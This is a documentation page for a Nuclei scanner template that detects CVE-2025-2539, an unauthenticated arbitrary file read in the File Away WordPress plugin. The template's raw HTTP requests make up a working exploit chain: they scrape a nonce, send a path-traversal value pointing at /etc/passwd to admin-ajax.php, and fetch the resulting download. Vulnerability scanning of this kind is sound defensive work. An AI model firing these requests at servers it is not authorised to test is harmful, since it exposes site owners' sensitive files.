File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
ID: CVE-2025-2539
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp
Description
Section titled “Description”The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm, to read the contents of arbitrary files on the server, which can contain sensitive information.
YAML Source
Section titled “YAML Source”id: CVE-2025-2539
info: name: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read author: iamnoooob,rootxharsh,pdresearch severity: high description: | The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm, to read the contents of arbitrary files on the server, which can contain sensitive information. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-away/file-away-39901-missing-authorization-to-unauthenticated-arbitrary-file-read - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_encrypted.php - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_stats.php - https://wordpress.org/plugins/file-away/#developers - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-2539 cwe-id: CWE-327 epss-score: 0.00038 epss-percentile: 0.08036 metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/file-away/" tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp
flow: http(1) && http(2) && http(3)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex name: nonce group: 1 regex: - 'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}' internal: true
- raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=fileaway-stats&nonce={{nonce}}&file=/../../../../../../../../etc/passwd
matchers: - type: word part: body internal: true words: - fileaway_download
extractors: - type: regex part: body internal: true name: download_url group: 1 regex: - '".*(\?.*?)"'
- raw: - | GET /{{download_url}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: regex part: body regex: - 'root:.*:0:0:'
- type: word part: content_type words: - "application/force-download"# digest: 4a0a0047304502206b81b441ceed0abd32f7e8d559b5be46efd33ebcb97be60edb1f45e2b241a4b702210092249cf08b1889f5959c7366b54c0f0554caa63a04ab34c1c1726c926181bfe6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-2539.yaml"